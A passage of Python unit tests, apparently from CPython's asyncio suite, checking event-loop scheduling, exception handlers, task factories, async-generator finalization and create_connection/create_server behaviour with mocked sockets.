with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
return []
# logging needs debug flag
self.loop.set_debug(True)
# Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(BaseException):
pass
async def foo(delay):
await asyncio.sleep(delay, loop=self.loop)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
try:
self.loop.run_until_complete(foo(0.1))
except ShowStopper:
pass
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
yield from asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
        # run_forever() consumes the KeyboardInterrupt and so doesn't log
# a warning
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
        # it's a de facto standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(hasattr(socket, 'AF_INET6'), 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
